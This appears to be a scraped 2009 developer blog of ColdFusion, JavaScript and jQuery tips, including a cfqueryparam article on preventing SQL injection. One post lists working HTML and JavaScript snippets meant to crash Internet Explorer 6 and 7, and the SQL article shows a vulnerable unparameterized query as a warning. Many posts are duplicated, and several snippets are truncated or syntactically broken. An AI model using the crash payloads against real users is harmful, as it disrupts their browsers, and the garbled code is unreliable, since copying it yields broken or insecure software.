you have an issue when your system is started u have to manually start the application even if the application is set to automatic.So here is the solution..
Open Control Panel; Select Administrative Tools; Right Click on Services and send it to the Desktop as a shortcut.
Now, open Services.
Find the CF 8 Application Server line and Right Click on it, and select Properties.
On the General Tab, make sure the Startup type is Automatic.
On the Recovery Tab, make the following entries:
First failure: Restart the Service
Second Failure: Run a program
Third failure: Take no action (I figure by this point, I have to do it manually!)
Run program
Program: Click the Browse button and find the jrunsvc.exe module.
Mine was under C:\inetpub\wwwroot\runtime\bin\jrunsvc.exe
Command line parameters: "ColdFusion 8 Application Server"
After you Apply the changes, click OK, then you might as well start the service while you are here. On your next boot, it should start up!
Tuesday, September 15, 2009
Monday, September 14, 2009
No Right Click in a Page
JS CODE:
var BM = 2; // button middle
var BR = 3; // button right
var msg ="MOUSE RIGHT CLICK IS NOT SUPPORTED ON THIS PAGE";
function mouseDown(e)
{
try { if (event.button==BM||event.button==BR) {return false;} }
catch (e) { if (e.which == BR) {return false;} }
}
document.oncontextmenu = function() { alert(msg); return false; }
document.onmousedown = mouseDown;
BUTTONRIGHT.ASPX:
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>No Right Click</title>
<script src="js/JScript.js" type="text/javascript"></script>
</head>
<body>
<form id="form1" runat="server">
<div>
<table bgcolor="yellow">
<tr>
<td>
<img src="images/Sunset.jpg" alt="sunset" />
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
OR BY SIMPLE ADDING ONCONTEXTMENU IN BODY:
<body oncontextmenu="return false;">
var BM = 2; // button middle
var BR = 3; // button right
var msg ="MOUSE RIGHT CLICK IS NOT SUPPORTED ON THIS PAGE";
function mouseDown(e)
{
try { if (event.button==BM||event.button==BR) {return false;} }
catch (e) { if (e.which == BR) {return false;} }
}
document.oncontextmenu = function() { alert(msg); return false; }
document.onmousedown = mouseDown;
BUTTONRIGHT.ASPX:
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>No Right Click</title>
<script src="js/JScript.js" type="text/javascript"></script>
</head>
<body>
<form id="form1" runat="server">
<div>
<table bgcolor="yellow">
<tr>
<td>
<img src="images/Sunset.jpg" alt="sunset" />
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
OR BY SIMPLE ADDING ONCONTEXTMENU IN BODY:
<body oncontextmenu="return false;">
Monday, August 31, 2009
ColdFusion 8 Getting Started Experience with videos demos:
http://examples.adobe.com/cf8gettingstarted/experience/index_content.cfm
Code Snippets by Feature and Tasks :
http://examples.adobe.com/cf8gettingstarted/experience/snippets.cfm
Explore Real-World Example Applications :
http://examples.adobe.com/cf8gettingstarted/experience/explore.cfm
You can now download it, and extract it into your web root by using the following link.
http://www.adobe.com/devnet/coldfusion/eula_cf8gettingstarted.html
I found Code Snippets feature very useful and u can find every information about the tags, Functions and its features.
Code Snippets by Feature and Tasks :
http://examples.adobe.com/cf8gettingstarted/experience/snippets.cfm
Explore Real-World Example Applications :
http://examples.adobe.com/cf8gettingstarted/experience/explore.cfm
You can now download it, and extract it into your web root by using the following link.
http://www.adobe.com/devnet/coldfusion/eula_cf8gettingstarted.html
I found Code Snippets feature very useful and u can find every information about the tags, Functions and its features.
Tuesday, August 18, 2009
Favicon in IE and Mozilla:
Favicon in IE and Mozilla:
Place the link :
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico"/> in the Master page.
By placing this link the favicon appears in Mozilla but in IE the favicon should be 16*16 and it should be
in the root folder.
Favicon generator :
Favicon generator
Place the link :
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico"/> in the Master page.
By placing this link the favicon appears in Mozilla but in IE the favicon should be 16*16 and it should be
in the root folder.
Favicon generator :
Favicon generator
Wednesday, April 22, 2009
Encrypt and Decrypt an image with Coldfusion
<!---
Test settings / Change these
--->
<!---
ENCRYPT
--->
<!---
DECRYPT (must use same settings used to ENCRYPT)
--->
Test settings / Change these
--->
<cfset inputImagePath = ExpandPath("./logo.gif")><!--- should be GIF, JPG, etc... ---><cfset imageType = listLast(inputImagePath, ".")><cfset encryptedImagePath = ExpandPath("./encryptedLogo.gif")><cfset decryptedImagePath = ExpandPath("./decryptedLogo.gif")>
<!--- note, "salt" should be varied for better security ---><cfset salt = BinaryDecode("28e9ac7b748194b0", "hex")><cfset iterations = 20><cfset password = "my password"><!---
ENCRYPT
--->
< <!--- read in the unencrypted image ---><cfset unencryptedImage = ImageGetBufferedImage( ImageRead( inputImagePath ) )>
<!--- get SecretKeyFactory for key generation ---><cfset passwordAlgorithm = "PBEWithMD5AndDES"><cfset keyFactory = createObject("java", "javax.crypto.SecretKeyFactory").getInstance(passwordAlgorithm)>
<!--- use SecretKeyFactory to create secret key using given password ---><cfset keySpec = createObject("java", "javax.crypto.spec.PBEKeySpec").init( password.toCharArray() )><cfset secretKey = keyFactory.generateSecret( keySpec )><!--- set up other parameters for password-based encryption ----><cfset keyParams = createObject("java", "javax.crypto.spec.PBEParameterSpec").init(salt, iterations)>
<!--- Create cipher and initialize it to ENCRYPT using the given password ---><cfset encyrptAlgorithm = "PBEWithMD5AndDES" ><cfset cipher = createObject("java", "javax.crypto.Cipher").getInstance(encyrptAlgorithm)><cfset cipher.init(Cipher.ENCRYPT_MODE, secretKey, keyParams)>
<!--- Create a regular output stream to store the encrypted image on disk ---><cfset outStream = createObject("java", "java.io.FileOutputStream").init( encryptedImagePath )><!--- Create a cipher output stream to encrypt the output ---><cfset cipherOutStream = createObject("java", "javax.crypto.CipherOutputStream").init( outStream, cipher )><!--- Write the encrypted image to disk ---><cfset ImageIO = createObject("java", "javax.imageio.ImageIO")><cfset ImageIO.write( unencryptedImage, imageType, cipherOutStream )>
<!--- Finish. Close both streams ---><cfset cipherOutStream.close()><cfset outStream.close()><!---
DECRYPT (must use same settings used to ENCRYPT)
--->
<!--- use SecretKeyFactory to get secret key ---><cfset passwordAlgorithm = "PBEWithMD5AndDES"><cfset keyFactory = createObject("java", "javax.crypto.SecretKeyFactory").getInstance(passwordAlgorithm)><cfset keySpec = createObject("java", "javax.crypto.spec.PBEKeySpec").init( password.toCharArray() )><cfset secretKey = keyFactory.generateSecret( keySpec )>
<!--- set up other parameters for password-based encryption ----><!--- "salt" should be varied for better security ---><cfset PBEParameterSpec = createObject("java", "javax.crypto.spec.PBEParameterSpec")><cfset keyParams = createObject("java", "javax.crypto.spec.PBEParameterSpec").init(salt, iterations)>
<!--- Initialize cipher for DECRYPT operation ---><cfset encyrptAlgorithm = "PBEWithMD5AndDES" ><cfset cipher = createObject("java", "javax.crypto.Cipher").getInstance(encyrptAlgorithm)><cfset cipher.init( cipher.DECRYPT_MODE, secretKey, keyParams)>
<!--- read the encrypted image from disk into a cipher stream for decrypting ---><cfset inStream = createObject("java", "java.io.FileInputStream").init( encryptedImagePath )><cfset CipherInputStream = createObject("java", "javax.crypto.CipherInputStream")><cfset cipherInStream = CipherInputStream.init(inStream, cipher)>
<!--- extract the decrypted image ---><cfset ImageIO = createObject("java", "javax.imageio.ImageIO")><cfset imageBuffered = ImageIO.read( cipherInStream )><cfset cipherInStream.close()>
<!--- Convert the decrypted image to a CF compatible image ---><cfset CFCompatibleImage = ImageNew(imageBuffered)>
<!--- **AND/OR** save the unecrypted image back to disk ---><cfset outputStream = createObject("java", "java.io.FileOutputStream").init( decryptedImagePath )><cfset ImageIO.write(imageBuffered, imageType, outputStream)><cfset outputStream.close()>
<b>Original Image</b><br> <cfimage action="writeToBrowser" source="#inputImagePath#">
<br><b>Encrypted Image</b><br>
<cftry>
<cfimage action="writeToBrowser" source="#encryptedImagePath#">
You should NOT see an image above
<cfcatch>
Success! Cannot render encrypted images
</cfcatch>
</cftry>
<br><b>Decrypted Image:</b><br>
<cfimage action="writeToBrowser" source="#decryptedImagePath#"> Coldfusion server side email validation
<cfoutput>
<cfset errors = "">
<cfif isDefined("Form.FIELDNAMES") >
<!--- validate formfields --->
<!--- First validate if form.lemail is empty --->
<cfif NOT Len(Trim(Form.lEmail))>
<cfset errors = ListAppend(errors,"Please write your email!","|")>
<cfset lEmailError = 1>
<cfelseif NOT IsValid("email", Form.lEmail)>
<cfset errors = ListAppend(errors,"Please write correct email format!","|")>
<cfset lEmailError = 1>
</cfif>
<!--- the rest of the logincode --->
.......
<!--- output errors --->
<CFIF errors NEQ "">
<CFLOOP list="#errors#" index="the_error" delimiters="|">
<li>#the_error#</li>
</CFLOOP>
<br/>
</CFIF>
</CFIF>
<form method="post" action="#CGI.SCRIPT_NAME#" name="loginform">
Email: <input type = "text" name="lemail" value="" class="textfieldLogin" /><br/>
Password: <input name="luserpassword" type="password" class="textfieldLogin" value=""/><br/>
<input type="submit" name="Logon" value="Logon" />
</form>
</cfoutput>
<cfset errors = "">
<cfif isDefined("Form.FIELDNAMES") >
<!--- validate formfields --->
<!--- First validate if form.lemail is empty --->
<cfif NOT Len(Trim(Form.lEmail))>
<cfset errors = ListAppend(errors,"Please write your email!","|")>
<cfset lEmailError = 1>
<cfelseif NOT IsValid("email", Form.lEmail)>
<cfset errors = ListAppend(errors,"Please write correct email format!","|")>
<cfset lEmailError = 1>
</cfif>
<!--- the rest of the logincode --->
.......
<!--- output errors --->
<CFIF errors NEQ "">
<CFLOOP list="#errors#" index="the_error" delimiters="|">
<li>#the_error#</li>
</CFLOOP>
<br/>
</CFIF>
</CFIF>
<form method="post" action="#CGI.SCRIPT_NAME#" name="loginform">
Email: <input type = "text" name="lemail" value="" class="textfieldLogin" /><br/>
Password: <input name="luserpassword" type="password" class="textfieldLogin" value=""/><br/>
<input type="submit" name="Logon" value="Logon" />
</form>
</cfoutput>
How to output XML file to HTML In Coldfusion
<!--- Answers to be stored in an array --->
<cfset hotspots=ArrayNew(1)>
<cfif(isXML(xml_string))>
<!--- XML string is a Valid XML --->
<!--- Parse XML into a Struct --->
<cfset xml_struct=XMLParse(xml_string)>
<!--- use cfdump to understand the xml_struct and modify the loop below to suit --->
<cfloop from="1" to="#ArrayLen(XMLRoot.Hotspot)#" index="i">
<cfset hotspot=StructNew()>
<cfloop list="Name,X,Y" index="attrib">
<cfif IStructKeyExists(XMLRoot.Hotspot[i].XMLAttributes,attrib)>
<cfset StructInsert(hotspot,attrib,XMLRoot.Hotspot[i].XMLAttributes[attrib],true)>
<cfelse>
<cfset StructInsert(hotspot,attrib,iif(attrib eq "Name",'""','"0"'),true)>
</cfif>
</cfloop>
<cfset ArrayAppend(hotspots,hotspot)>
</cfloop>
<cfelse>
<!--- find the 1st case of <hotspot[^>]*> --->
<cfset hotspot_find=ReFindNoCase(xml_string,"<hotspot[^>]*>",1,true)>
<!--- Loop while hotspot_find is successful --->
<cfloop condition="#hotspot_find.len[1]#">
<!--- create a structure to hold the answers --->
<cfset hotspot=StructNew()>
<--- extract the individual <hotspot> element --->
<cfset hotspot_data=mid(xml_string,hotspot_find.pos[1],hotspot_find.len[1])>
<!--- loop for the required attributes --->
<cfloop list="name,x,y" index="attrib">
<!--- search for the attributes --->
<cfset attrib_find=ReFindNoCase(hotspot_data,'#Attrib#="[^"]*"',1,true)>
<cfif ArrayLen(attrib_find.len) eq 2 and attrib_find.len[1]>
<!--- Attribute exists and has value --->
<cfset structInsert(hotspot,attrib,mid(hotspot_data,attrib_find.pos[1],attrib_find.len[1]),true)>
<cfelse>
<!--- Attribute doesn't exist or has no value --->
<cfset structInsert(hotspot,attrib,iif(attrib eq "name",'""','"0"'),true>
</cfif>
</cfloop>
<!--- Append the struct hotspot to the array hotspots --->
<cfset ArrayAppend(hotspots,hotspot)>
<!--- Locate the next <hotspot> element --->
<cfset hotspot_find=ReFindNoCase(xml_string,"<hotspot[^>]*>",hotspot_find.pos[1]+hotspot_find.len[1],true)>
</cfloop>
</cfif>
<cfdump var="#hotspots#">
<cfset hotspots=ArrayNew(1)>
<cfif(isXML(xml_string))>
<!--- XML string is a Valid XML --->
<!--- Parse XML into a Struct --->
<cfset xml_struct=XMLParse(xml_string)>
<!--- use cfdump to understand the xml_struct and modify the loop below to suit --->
<cfloop from="1" to="#ArrayLen(XMLRoot.Hotspot)#" index="i">
<cfset hotspot=StructNew()>
<cfloop list="Name,X,Y" index="attrib">
<cfif IStructKeyExists(XMLRoot.Hotspot[i].XMLAttributes,attrib)>
<cfset StructInsert(hotspot,attrib,XMLRoot.Hotspot[i].XMLAttributes[attrib],true)>
<cfelse>
<cfset StructInsert(hotspot,attrib,iif(attrib eq "Name",'""','"0"'),true)>
</cfif>
</cfloop>
<cfset ArrayAppend(hotspots,hotspot)>
</cfloop>
<cfelse>
<!--- find the 1st case of <hotspot[^>]*> --->
<cfset hotspot_find=ReFindNoCase(xml_string,"<hotspot[^>]*>",1,true)>
<!--- Loop while hotspot_find is successful --->
<cfloop condition="#hotspot_find.len[1]#">
<!--- create a structure to hold the answers --->
<cfset hotspot=StructNew()>
<--- extract the individual <hotspot> element --->
<cfset hotspot_data=mid(xml_string,hotspot_find.pos[1],hotspot_find.len[1])>
<!--- loop for the required attributes --->
<cfloop list="name,x,y" index="attrib">
<!--- search for the attributes --->
<cfset attrib_find=ReFindNoCase(hotspot_data,'#Attrib#="[^"]*"',1,true)>
<cfif ArrayLen(attrib_find.len) eq 2 and attrib_find.len[1]>
<!--- Attribute exists and has value --->
<cfset structInsert(hotspot,attrib,mid(hotspot_data,attrib_find.pos[1],attrib_find.len[1]),true)>
<cfelse>
<!--- Attribute doesn't exist or has no value --->
<cfset structInsert(hotspot,attrib,iif(attrib eq "name",'""','"0"'),true>
</cfif>
</cfloop>
<!--- Append the struct hotspot to the array hotspots --->
<cfset ArrayAppend(hotspots,hotspot)>
<!--- Locate the next <hotspot> element --->
<cfset hotspot_find=ReFindNoCase(xml_string,"<hotspot[^>]*>",hotspot_find.pos[1]+hotspot_find.len[1],true)>
</cfloop>
</cfif>
<cfdump var="#hotspots#">
Tuesday, April 7, 2009
JQuery tips and tricks
Who doesn’t like JQuery? This fast and easy to use Javascript framework became very popular in 2008. In the following article, I have compiled a list of 8 absolutely useful JQuery hacks, tips and tricks.
Target blank links
Do you use the target=blank attribute on links? If yes, you might know that XHTML 1.0 Strict don't allow it. A good solution to this problem should be using JQuery to make links opening in new windows:
$('a[@rel$='external']').click(function(){
this.target = "_blank";
});
/*
Usage:
<a href="http://www.lepinskidesign.com.br/" rel="external">lepinskidesign.com.br</a>
*/
Get the total number of matched elements
That what I call a very simple, but very useful tip: This will return the number of matched elements:
$('element').size();
Preloading images
When you're using images in Javascript, a good thing is to preload it before you have to use it. This code will do the job:
jQuery.preloadImages = function()
{
for(var i = 0; i").attr("src", arguments[i]);
}
};
// Usage
$.preloadImages("image1.gif", "/path/to/image2.png", "some/image3.jpg");
Detect browser
Although it is better to use CSS conditionnal comments to detect a specific browser and apply some css style, it is a very easy thing to do with JQuery, which can be useful at times.
//A. Target Safari
if( $.browser.safari ) $("#menu li a").css("padding", "1em 1.2em" );
//B. Target anything above IE6
if ($.browser.msie && $.browser.version > 6 ) $("#menu li a").css("padding", "1em 1.8em" );
//C. Target IE6 and below
if ($.browser.msie && $.browser.version <= 6 ) $("#menu li a").css("padding", "1em 1.8em" );
//D. Target Firefox 2 and above
if ($.browser.mozilla && $.browser.version >= "1.8" ) $("#menu li a").css("padding", "1em 1.8em" );
Remove a word in a text
Do you ever wanted to be able to remove words in a text? Note that the following code can be easily modified to replace a word by another.
var el = $('#id');
el.html(el.html().replace(/word/ig, ""));
Columns of equal height
This seems to be a highly-requested hack: How to use two CSS columns, and make them having exactly the same height? Happilly Rob from cssnewbie have the solution.
function equalHeight(group) {
tallest = 0;
group.each(function() {
thisHeight = $(this).height();
if(thisHeight > tallest) {
tallest = thisHeight;
}
});
group.height(tallest);
}
/*
Usage:
$(document).ready(function() {
equalHeight($(".recent-article"));
equalHeight($(".footer-col"));
});
*/
Source: Equal Height Columns with jQuery
Font resizing
Font Resizing is a very common feature in many modern websites. Here's how to do it with JQuery.
$(document).ready(function(){
// Reset Font Size
var originalFontSize = $('html').css('font-size');
$(".resetFont").click(function(){
$('html').css('font-size', originalFontSize);
});
// Increase Font Size
$(".increaseFont").click(function(){
var currentFontSize = $('html').css('font-size');
var currentFontSizeNum = parseFloat(currentFontSize, 10);
var newFontSize = currentFontSizeNum*1.2;
$('html').css('font-size', newFontSize);
return false;
});
// Decrease Font Size
$(".decreaseFont").click(function(){
var currentFontSize = $('html').css('font-size');
var currentFontSizeNum = parseFloat(currentFontSize, 10);
var newFontSize = currentFontSizeNum*0.8;
$('html').css('font-size', newFontSize);
return false;
});
});
Source: Text Resizing With jQuery
Disable right-click contextual menu
There's many Javascript snippets available to disable right-click contextual menu, but JQuery makes things a lot easier:
$(document).ready(function(){
$(document).bind("contextmenu",function(e){
return false;
});
});
Target blank links
Do you use the target=blank attribute on links? If yes, you might know that XHTML 1.0 Strict don't allow it. A good solution to this problem should be using JQuery to make links opening in new windows:
$('a[@rel$='external']').click(function(){
this.target = "_blank";
});
/*
Usage:
<a href="http://www.lepinskidesign.com.br/" rel="external">lepinskidesign.com.br</a>
*/
Get the total number of matched elements
That what I call a very simple, but very useful tip: This will return the number of matched elements:
$('element').size();
Preloading images
When you're using images in Javascript, a good thing is to preload it before you have to use it. This code will do the job:
jQuery.preloadImages = function()
{
for(var i = 0; i").attr("src", arguments[i]);
}
};
// Usage
$.preloadImages("image1.gif", "/path/to/image2.png", "some/image3.jpg");
Detect browser
Although it is better to use CSS conditionnal comments to detect a specific browser and apply some css style, it is a very easy thing to do with JQuery, which can be useful at times.
//A. Target Safari
if( $.browser.safari ) $("#menu li a").css("padding", "1em 1.2em" );
//B. Target anything above IE6
if ($.browser.msie && $.browser.version > 6 ) $("#menu li a").css("padding", "1em 1.8em" );
//C. Target IE6 and below
if ($.browser.msie && $.browser.version <= 6 ) $("#menu li a").css("padding", "1em 1.8em" );
//D. Target Firefox 2 and above
if ($.browser.mozilla && $.browser.version >= "1.8" ) $("#menu li a").css("padding", "1em 1.8em" );
Remove a word in a text
Do you ever wanted to be able to remove words in a text? Note that the following code can be easily modified to replace a word by another.
var el = $('#id');
el.html(el.html().replace(/word/ig, ""));
Columns of equal height
This seems to be a highly-requested hack: How to use two CSS columns, and make them having exactly the same height? Happilly Rob from cssnewbie have the solution.
function equalHeight(group) {
tallest = 0;
group.each(function() {
thisHeight = $(this).height();
if(thisHeight > tallest) {
tallest = thisHeight;
}
});
group.height(tallest);
}
/*
Usage:
$(document).ready(function() {
equalHeight($(".recent-article"));
equalHeight($(".footer-col"));
});
*/
Source: Equal Height Columns with jQuery
Font resizing
Font Resizing is a very common feature in many modern websites. Here's how to do it with JQuery.
$(document).ready(function(){
// Reset Font Size
var originalFontSize = $('html').css('font-size');
$(".resetFont").click(function(){
$('html').css('font-size', originalFontSize);
});
// Increase Font Size
$(".increaseFont").click(function(){
var currentFontSize = $('html').css('font-size');
var currentFontSizeNum = parseFloat(currentFontSize, 10);
var newFontSize = currentFontSizeNum*1.2;
$('html').css('font-size', newFontSize);
return false;
});
// Decrease Font Size
$(".decreaseFont").click(function(){
var currentFontSize = $('html').css('font-size');
var currentFontSizeNum = parseFloat(currentFontSize, 10);
var newFontSize = currentFontSizeNum*0.8;
$('html').css('font-size', newFontSize);
return false;
});
});
Source: Text Resizing With jQuery
Disable right-click contextual menu
There's many Javascript snippets available to disable right-click contextual menu, but JQuery makes things a lot easier:
$(document).ready(function(){
$(document).bind("contextmenu",function(e){
return false;
});
});
html and javascript codes to crash IE6
Let's start with the longest of all:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow: hidden;
scrollbar-base-color: #330066;
}
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
Javascript and IE6, a true love story...
<script>for (x in document.write) { document.write(x);}</script>
This one was discover last year:
<style>*{position:relative}</style><table><input></table>
Anti-IE Javascript strikes back!
<body onLoad=”window()”>
Now my favorite: 11 symbols and...bang :D
<STYLE>@;/*
This one is the only one I know which make IE7 crash:
function getX( oElement ) {
var iReturnValue = 0;
while( oElement != null ) {
iReturnValue += oElement.offsetLeft;
oElement = oElement.offsetParent;
}
return iReturnValue;
}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow: hidden;
scrollbar-base-color: #330066;
}
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
Javascript and IE6, a true love story...
<script>for (x in document.write) { document.write(x);}</script>
This one was discover last year:
<style>*{position:relative}</style><table><input></table>
Anti-IE Javascript strikes back!
<body onLoad=”window()”>
Now my favorite: 11 symbols and...bang :D
<STYLE>@;/*
This one is the only one I know which make IE7 crash:
function getX( oElement ) {
var iReturnValue = 0;
while( oElement != null ) {
iReturnValue += oElement.offsetLeft;
oElement = oElement.offsetParent;
}
return iReturnValue;
}
Thursday, April 2, 2009
CFML Certification preparation Resources
The tools mentioned here are still only oriented toward CF 7, so if you're looking for CF8-specific information, the best bet is the
http://livedocs.adobe.com/coldfusion/8/htmldocs/
http://www.adobe.com/support/certification/index.html
http://www.adobe.com/support/training/certified_professional_program/cfmx7_developer.html
http://www.amazon.com/Macromedia-ColdFusion-Certified-Developer-Study/dp/0321330110
for further information log on to
http://www.cf411.com/#certprep
http://livedocs.adobe.com/coldfusion/8/htmldocs/
http://www.adobe.com/support/certification/index.html
http://www.adobe.com/support/training/certified_professional_program/cfmx7_developer.html
http://www.amazon.com/Macromedia-ColdFusion-Certified-Developer-Study/dp/0321330110
for further information log on to
http://www.cf411.com/#certprep
Sql Injection vulnerabilities in your Application
http://www.codersrevolution.com/index.cfm/2008/7/24/Parameterize-your-queries-without-lifting-a-finge
and download :
http://www.webapper.net/index.cfm/2008/7/22/ColdFusion-SQL-Injection
it will check all the
queries with sql injection weakness and add cfqueryparam for all the queries .....for this u have to keep the downloaded file in to the webroot and run the file...
Here's the highlights of Daryl's script:
* It's a single stand alone .cfm file
* It will (optionally) drill down recursively from its current location and scan all CFML for cfquery tags with missing cfqueryparam tags
* It automatically skips files starting with an underscore, and folders starting with a period
* The tool gives you the option to check a box next to the queries you want to automatically fix, and submit the form. It will then edit each of those files and wrap your parameters in a cfqueryparam tag!
* It backs up the old file for you in case to need to roll back (test.cfm.old)
* In general the only attribute it uses for the cfqueryparam tag is value, but it will add cfsqltype="CF_SQL_TIMESTAMP" if the column name contains the word "date", or the parameter contains "now()"
go through this link
and download :
http://www.webapper.net/index.cfm/2008/7/22/ColdFusion-SQL-Injection
it will check all the
queries with sql injection weakness and add cfqueryparam for all the queries .....for this u have to keep the downloaded file in to the webroot and run the file...
Here's the highlights of Daryl's script:
* It's a single stand alone .cfm file
* It will (optionally) drill down recursively from its current location and scan all CFML for cfquery tags with missing cfqueryparam tags
* It automatically skips files starting with an underscore, and folders starting with a period
* The tool gives you the option to check a box next to the queries you want to automatically fix, and submit the form. It will then edit each of those files and wrap your parameters in a cfqueryparam tag!
* It backs up the old file for you in case to need to roll back (test.cfm.old)
* In general the only attribute it uses for the cfqueryparam tag is value, but it will add cfsqltype="CF_SQL_TIMESTAMP" if the column name contains the word "date", or the parameter contains "now()"
go through this link
Tuesday, March 3, 2009
SQL Injection in ColdFusion
Registry software
cfqueryparam Tag:
Hardly a day goes by without news of another security problem on the Internet, but many ColdFusion developers tend to think of security as something best left to system administrators.
But while it’s important to securely configure servers, it’s also vitally important to write applications with security in mind. One of the most common and most serious security problems within ColdFusion applications is failing to validate all data sent from a browser. A third party with access to network traffic between the browser and server, or more likely, a malicious end-user can easily tamper any data sent from a browser before it reaches your server. In addition to security concerns, programming best practices ensures that your application receives only acceptable input values.
How can you accomplish this easily? The answer, in most cases, is to use the cfqueryparam tag. This tag, introduced in ColdFusion 4, separates parameters from the surrounding SQL. This has two benefits: it allows the database’s SQL analyzer to more efficiently handle the SQL statement in many cases, and it validates data for the parameters. Think of the cfqueryparam tag as a two-for-one deal benefit. It gives you better performance and better security.
What Could Possibly Go Wrong Without Using the cfqueryparam Tag?
It’s pretty easy to demonstrate the security problems inherent in passing unfiltered data to your database. Say you use Microsoft SQL Server and you built a master-detail interface, something common in nearly every ColdFusion application. On the master page, you might have some code that passes a surrogate primary key to the detail page:
<cfoutput query="qGetItems">
<a href="showitem.cfm?itemid=#qGetItems.ItemID#">
#qGetItems.ItemName#
</a><br>
</cfoutput>
Then, on your detail page, you might have a query like this:
<cfquery name="qGetItemDetail" datasource="...">
SELECT *
FROM Item
WHERE ItemID = #URL.ItemID#
</cfquery>
Carefully examining the code above shows that that the detail page expects the variable, URL.ItemID, to be an integer. This is a reasonable expectation, given the construction of the hyperlink on the master page. However, there’s nothing to stop someone from changing the value of URL.ItemID by simply typing in a different value in the browser address:
At this point, there are many things that the end user might enter:
* A different valid number
* A number that doesn’t match any item.
* A value that is something altogether different.
The "something altogether different," when the end user intends to attack your database, is commonly referred to as a SQL injection attack. What follows is a common SQL injection attack used against SQL Server:
In the above example, the address has a valid URL parameter for the primary key value, itemid. But its value is a big string of gibberish. The contents instruct the database server to create a new local user account. By calling the xp_cmdshell system stored procedure, the end user instructs SQL Server to do all sorts of wacky things to do anything that you could do from a command prompt. This end users does all of these actions using whatever set of permissions the SQL Server service has, typically LocalSystem! Naturally, this is a very dangerous security breach.
To build this SQL injection attack, the end user uses double quotes instead of single quotes to wrap the command line he wants to execute. He encodes spaces encoded using the appropriate URL encoding (%20).
An end user could also send the same text directly to the server without using a browser at all. Using a common telnet client would be sufficient; the end user could change any information beforehand. In short, a user can change any data from a browser. If you plan to use any of user inputted data in your SQL, sanitize it first
Using the cfqueryparam Tag
How can you easily prevent the hack I just described above? Use cfqueryparam tag as follows:
<cfquery name="qGetItemDetail" datasource="...">
SELECT *
FROM Item
WHERE ItemID = <cfqueryparam
cfsqltype="CF_SQL_INTEGER"
value="#URL.ItemID#">
</cfquery>
In the above example, using the cfqueryparam tag ensures that the value sent to the database contains an integer and nothing else. If you enable debug output, the following appears:
The syntax for the cfqueryparam tag is pretty straightforward; there are two required attributes which specify the datatype and the value. The cfsqltype attribute specifies the datatype. Set it to one of the types listed in the documentation, such as CF_SQL_INTEGER or CF_SQL_VARCHAR. Set the value attribute to the passed value you want to test.
You can use the list attribute in the cfqueryparam tag to pass lists to your queries; you can use this attribute to filter variables you want to use with an IN or EXISTS SQL clause.
You can use the maxlength attribute in the cfqueryparam tag to specify the maximum length for character strings passed to your queries. When passing floating point values, use the SCALE attribute in the cfqueryparam tag to specify their precision.
One other neat trick you can do with cfqueryparam is using the null attribute to pass null values to the database. Normally, if you wanted to pass a null within your SQL, you might write code like this:
<cfquery ...>
UPDATE Item
SET ItemName = '#Trim(Form.ItemName)#',
ItemDesc = <cfif Len(Trim(Form.ItemDesc))>
'#Trim(Form.ItemDesc)#'
<cfelse>
null
</cfif>
WHERE ItemID = #Form.ItemID#
</cfquery>
This code would pass a null to the database if the user didn’t enter a value into the form field. Using cfqueryparam, you could rewrite the code as follows:
<cfquery ...>
UPDATE Item
SET ItemName = <cfqueryparam
cfsqltype="CF_SQL_VARCHAR"
value="#Form.ItemName#">,
ItemDesc = <cfqueryparam
cfsqltype="CF_SQL_VARCHAR"
value="#Form.ItemDesc#"
null = "#YesNoFormat(NOT Len(Trim(Form.ItemDesc)))#">
WHERE ItemID = <cfqueryparam
cfsqltype="CF_SQL_INTEGER"
value="#Form.ItemID#">
</cfquery>
Caching with the cfqueryparam Tag
One limitation of cfqueryparam is that you can’t use the cachedwithin or cachedafter attributes of the cfquery tag when using the cfqueryparam tag. Using that combination will cause an error message. However, you can work around this by caching the Query variable within a persistent memory scope (Session, Application or Server), or by using the Query-of-Query functionality in ColdFusion MX.
Performance and the cfqueryparam Tag
As mentioned earlier, the cfqueryparam tag may enhance the performance of your SQL statements. Many common database servers can more quickly build a plan for executing your SQL when you build a prepared statement, and they may also cache that plan for later use.
cfqueryparam Tag:
Hardly a day goes by without news of another security problem on the Internet, but many ColdFusion developers tend to think of security as something best left to system administrators.
But while it’s important to securely configure servers, it’s also vitally important to write applications with security in mind. One of the most common and most serious security problems within ColdFusion applications is failing to validate all data sent from a browser. A third party with access to network traffic between the browser and server, or more likely, a malicious end-user can easily tamper any data sent from a browser before it reaches your server. In addition to security concerns, programming best practices ensures that your application receives only acceptable input values.
How can you accomplish this easily? The answer, in most cases, is to use the cfqueryparam tag. This tag, introduced in ColdFusion 4, separates parameters from the surrounding SQL. This has two benefits: it allows the database’s SQL analyzer to more efficiently handle the SQL statement in many cases, and it validates data for the parameters. Think of the cfqueryparam tag as a two-for-one deal benefit. It gives you better performance and better security.
What Could Possibly Go Wrong Without Using the cfqueryparam Tag?
